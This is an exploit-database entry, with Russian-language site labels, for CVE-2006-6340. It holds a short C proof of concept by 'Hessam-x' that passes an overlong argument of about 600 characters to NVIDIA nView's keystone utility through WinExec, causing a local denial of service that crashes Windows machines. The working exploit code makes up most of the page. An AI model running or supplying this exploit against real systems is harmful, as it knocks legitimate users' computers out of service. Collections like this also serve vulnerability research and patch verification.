- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 29170
- Проверка EDB
-
- Пройдено
- Автор
- HESSAM-X
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2006-6340
- Дата публикации
- 2006-11-23
C:
// source: https://www.securityfocus.com/bid/21260/info
NVIDIA nView is prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to crash the affected computer, denying service to legitimate users.
/*
NVIDIA nView (keystone) local Denial Of service
(c)oded By Hessam-x / www.Hessamx.net
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
int main()
{
char junk[] = "a";
char box[650];
char *buf;
int i;
printf("-:: NVIDIA nView (keystone) Denial Of service \n");
printf("-:: Coded By Hessam-x / www.hessamx.net \n");
strcpy(box,"a");
for (i = 0; i < 600; i++) {
strcat(box,junk);
}
buf = (char *) malloc(650);
strcpy (buf,"keystone\t");
strcat (buf,box);
buf[650-1]='\0';
WinExec(buf,0);
free(buf);
}
- Источник
- www.exploit-db.com